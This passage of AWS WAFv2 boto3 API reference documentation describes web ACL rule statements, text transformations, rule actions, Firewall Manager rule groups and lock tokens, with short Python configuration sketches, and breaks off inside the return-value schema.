The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
ComparisonOperator (string) --
The operator to use to compare the request part to the size setting.
Size (integer) --
The size, in bytes, to compare to the request part, after any transformations.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
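As a hedged sketch of the 8 KB guidance above, a SizeConstraintStatement that matches requests whose body is larger than 8192 bytes (which you could pair with a blocking rule action) might be shaped like this:
# Hypothetical size constraint: request body larger than 8192 bytes (8 KB).
size_constraint_statement = {
    'FieldToMatch': {'Body': {}},
    'ComparisonOperator': 'GT',
    'Size': 8192,
    'TextTransformations': [{'Priority': 0, 'Type': 'NONE'}]
}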
GeoMatchStatement (dict) --
A rule statement used to identify web requests based on country of origin.
CountryCodes (list) --
An array of two-character country codes, for example, [ "US", "CN" ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.
(string) --
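For example (illustrative values only), a GeoMatchStatement that matches requests originating from the United States or China would be shaped like this:
geo_match_statement = {
    'CountryCodes': ['US', 'CN']  # ISO 3166 alpha-2 codes
}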
RuleGroupReferenceStatement (dict) --
A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.
You cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
ExcludedRules (list) --
The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
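A sketch of a RuleGroupReferenceStatement, assuming a hypothetical rule group ARN and a rule named ExampleRuleToSkip that you want overridden to COUNT:
rule_group_reference_statement = {
    # Hypothetical rule group ARN.
    'ARN': 'arn:aws:wafv2:us-east-1:123456789012:regional/rulegroup/example/abc123',
    'ExcludedRules': [{'Name': 'ExampleRuleToSkip'}]
}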
IPSetReferenceStatement (dict) --
A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .
Each IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.
ARN (string) --
The Amazon Resource Name (ARN) of the IPSet that this statement references.
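A minimal sketch of wiring an IP set into a rule, assuming a boto3 client and a hypothetical set name; CreateIPSet returns the ARN that the statement references:
import boto3

client = boto3.client('wafv2')

# Hypothetical IP set containing a single address range.
ip_set = client.create_ip_set(
    Name='example-blocked-ips',
    Scope='REGIONAL',
    IPAddressVersion='IPV4',
    Addresses=['192.0.2.44/32']
)

ip_set_reference_statement = {
    'ARN': ip_set['Summary']['ARN']
}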
RegexPatternSetReferenceStatement (dict) --
A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .
Each regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.
ARN (string) --
The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
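As an illustrative sketch, a RegexPatternSetReferenceStatement that applies a hypothetical pattern set to the URI path after URL-decoding could be shaped like this:
regex_pattern_set_reference_statement = {
    # Hypothetical regex pattern set ARN.
    'ARN': 'arn:aws:wafv2:us-east-1:123456789012:regional/regexpatternset/example/def456',
    'FieldToMatch': {'UriPath': {}},
    'TextTransformations': [{'Priority': 0, 'Type': 'URL_DECODE'}]
}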
RateBasedStatement (dict) --
A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.
When the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.
You can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:
An IP match statement with an IP set that specified the address 192.0.2.44.
A string match statement that searches in the User-Agent header for the string BadBot.
In this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.
You cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
Limit (integer) --
The limit on requests per 5-minute period for a single originating IP address. If the statement includes a ScopeDownStatement , this limit is applied only to the requests that match the statement.
AggregateKeyType (string) --
Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.
ScopeDownStatement (dict) --
An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.
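The rate-based example described above (a limit of 1,000 requests, scoped down to requests from 192.0.2.44 whose User-Agent contains BadBot) could be sketched as the following statement; the IP set ARN is hypothetical:
rate_based_statement = {
    'Limit': 1000,
    'AggregateKeyType': 'IP',
    'ScopeDownStatement': {
        'AndStatement': {
            'Statements': [
                {'IPSetReferenceStatement': {
                    # Hypothetical IP set ARN containing 192.0.2.44/32.
                    'ARN': 'arn:aws:wafv2:us-east-1:123456789012:regional/ipset/example/abc123'
                }},
                {'ByteMatchStatement': {
                    'SearchString': b'BadBot',
                    'FieldToMatch': {'SingleHeader': {'Name': 'User-Agent'}},
                    'TextTransformations': [{'Priority': 0, 'Type': 'NONE'}],
                    'PositionalConstraint': 'CONTAINS'
                }}
            ]
        }
    }
}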
AndStatement (dict) --
A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .
Statements (list) --
The statements to combine with AND logic. You can use any statements that can be nested.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.
OrStatement (dict) --
A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .
Statements (list) --
The statements to combine with OR logic. You can use any statements that can be nested.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.
NotStatement (dict) --
A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .
Statement (dict) --
The statement to negate. You can use any statement that can be nested.
ManagedRuleGroupStatement (dict) --
A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .
You can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
VendorName (string) --
The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --
The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
ExcludedRules (list) --
The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
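An illustrative ManagedRuleGroupStatement referencing the AWS-managed common rule set (vendor and group names are retrievable with ListAvailableManagedRuleGroups), with one exclusion; the excluded rule name is a hypothetical example:
managed_rule_group_statement = {
    'VendorName': 'AWS',
    'Name': 'AWSManagedRulesCommonRuleSet',
    'ExcludedRules': [{'Name': 'SizeRestrictions_BODY'}]  # hypothetical exclusion
}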
Action (dict) --
The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.
This is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .
You must specify either this Action setting or the rule OverrideAction setting, but not both:
If the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.
If the rule statement references a rule group, use the override action setting and not this action setting.
Block (dict) --
Instructs AWS WAF to block the web request.
Allow (dict) --
Instructs AWS WAF to allow the web request.
Count (dict) --
Instructs AWS WAF to count the web request and allow it.
OverrideAction (dict) --
The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .
Set the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.
In a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:
If the rule statement references a rule group, use this override action setting and not the action setting.
If the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.
Count (dict) --
Override the rule action setting to count.
None (dict) --
Don\'t override the rule action setting.
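To illustrate the Action/OverrideAction split described above, two hedged rule sketches: one with its own statement (uses Action), one referencing a rule group (uses OverrideAction); names and metric names are hypothetical:
# Rule with its own statement: set Action, not OverrideAction.
blocking_rule = {
    'Name': 'block-bad-bot',  # hypothetical
    'Priority': 0,
    'Statement': {'ByteMatchStatement': {
        'SearchString': b'BadBot',
        'FieldToMatch': {'SingleHeader': {'Name': 'User-Agent'}},
        'TextTransformations': [{'Priority': 0, 'Type': 'NONE'}],
        'PositionalConstraint': 'CONTAINS'
    }},
    'Action': {'Block': {}},
    'VisibilityConfig': {
        'SampledRequestsEnabled': True,
        'CloudWatchMetricsEnabled': True,
        'MetricName': 'blockBadBot'
    }
}

# Rule that references a rule group: set OverrideAction, not Action.
rule_group_rule = {
    'Name': 'managed-common-rules',  # hypothetical
    'Priority': 1,
    'Statement': {'ManagedRuleGroupStatement': {
        'VendorName': 'AWS',
        'Name': 'AWSManagedRulesCommonRuleSet'
    }},
    'OverrideAction': {'None': {}},
    'VisibilityConfig': {
        'SampledRequestsEnabled': True,
        'CloudWatchMetricsEnabled': True,
        'MetricName': 'managedCommonRules'
    }
}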
VisibilityConfig (dict) --
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --
A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --
A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --
A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can\'t change a MetricName after you create a VisibilityConfig .
VisibilityConfig (dict) --
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --
A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --
A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --
A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can\'t change a MetricName after you create a VisibilityConfig .
Capacity (integer) --
The web ACL capacity units (WCUs) currently being used by this web ACL.
AWS WAF uses WCUs to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. AWS WAF calculates capacity differently for each rule type, to reflect the relative cost of each rule. Simple rules that cost little to run use fewer WCUs than more complex rules that use more processing power. Rule group capacity is fixed at creation, which helps users plan their web ACL WCU usage when they use a rule group. The WCU limit for web ACLs is 1,500.
PreProcessFirewallManagerRuleGroups (list) --
The first set of rules for AWS WAF to process in the web ACL. This is defined in an AWS Firewall Manager WAF policy and contains only rule group references. You can\'t alter these. Any rules and rule groups that you define for the web ACL are prioritized after these.
In the Firewall Manager WAF policy, the Firewall Manager administrator can define a set of rule groups to run first in the web ACL and a set of rule groups to run last. Within each set, the administrator prioritizes the rule groups, to determine their relative processing order.
(dict) --
A rule group that\'s defined for an AWS Firewall Manager WAF policy.
Name (string) --
The name of the rule group. You cannot change the name of a rule group after you create it.
Priority (integer) --
If you define more than one rule group in the first or last Firewall Manager rule groups, AWS WAF evaluates each request against the rule groups in order, starting from the lowest priority setting. The priorities don\'t need to be consecutive, but they must all be different.
FirewallManagerStatement (dict) --
The processing guidance for an AWS Firewall Manager rule. This is like a regular rule Statement , but it can only contain a rule group reference.
ManagedRuleGroupStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .
You can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
VendorName (string) --
The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --
The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
ExcludedRules (list) --
The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
RuleGroupReferenceStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.
You cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
ExcludedRules (list) --
The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
OverrideAction (dict) --
The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .
Set the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.
In a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:
If the rule statement references a rule group, use this override action setting and not the action setting.
If the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.
Count (dict) --
Override the rule action setting to count.
None (dict) --
Don\'t override the rule action setting.
VisibilityConfig (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --
A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --
A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --
A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can\'t change a MetricName after you create a VisibilityConfig .
PostProcessFirewallManagerRuleGroups (list) --
The last set of rules for AWS WAF to process in the web ACL. This is defined in an AWS Firewall Manager WAF policy and contains only rule group references. You can\'t alter these. Any rules and rule groups that you define for the web ACL are prioritized before these.
In the Firewall Manager WAF policy, the Firewall Manager administrator can define a set of rule groups to run first in the web ACL and a set of rule groups to run last. Within each set, the administrator prioritizes the rule groups, to determine their relative processing order.
(dict) --
A rule group that\'s defined for an AWS Firewall Manager WAF policy.
Name (string) --
The name of the rule group. You cannot change the name of a rule group after you create it.
Priority (integer) --
If you define more than one rule group in the first or last Firewall Manager rule groups, AWS WAF evaluates each request against the rule groups in order, starting from the lowest priority setting. The priorities don\'t need to be consecutive, but they must all be different.
FirewallManagerStatement (dict) --
The processing guidance for an AWS Firewall Manager rule. This is like a regular rule Statement , but it can only contain a rule group reference.
ManagedRuleGroupStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .
You can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
VendorName (string) --
The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --
The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
ExcludedRules (list) --
The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
RuleGroupReferenceStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.
You cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
ExcludedRules (list) --
The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
OverrideAction (dict) --
The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .
Set the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.
In a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:
If the rule statement references a rule group, use this override action setting and not the action setting.
If the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.
Count (dict) --
Override the rule action setting to count.
None (dict) --
Don\'t override the rule action setting.
VisibilityConfig (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --
A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --
A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --
A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can\'t change a MetricName after you create a VisibilityConfig .
ManagedByFirewallManager (boolean) --
Indicates whether this web ACL is managed by AWS Firewall Manager. If true, then only AWS Firewall Manager can delete the web ACL or any Firewall Manager rule groups in the web ACL.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
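A hedged sketch of the get/modify/update cycle that the LockToken supports, assuming a regional web ACL with a hypothetical name and Id; update_web_acl resends the full configuration along with the token:
import boto3

client = boto3.client('wafv2')

# Retrieve the current web ACL and its lock token (hypothetical name/id).
response = client.get_web_acl(
    Name='example-web-acl',
    Scope='REGIONAL',
    Id='11111111-2222-3333-4444-555555555555'
)
web_acl = response['WebACL']

# ... modify web_acl['Rules'] locally as needed ...

# Write the change back; the call fails with WAFOptimisticLockException
# if the web ACL changed since the LockToken was issued.
client.update_web_acl(
    Name=web_acl['Name'],
    Scope='REGIONAL',
    Id=web_acl['Id'],
    DefaultAction=web_acl['DefaultAction'],
    Rules=web_acl['Rules'],
    VisibilityConfig=web_acl['VisibilityConfig'],
    LockToken=response['LockToken']
)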
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'WebACL': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'DefaultAction': {
'Block': {},
'Allow': {}
},
'Description': 'string',
'Rules': [
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
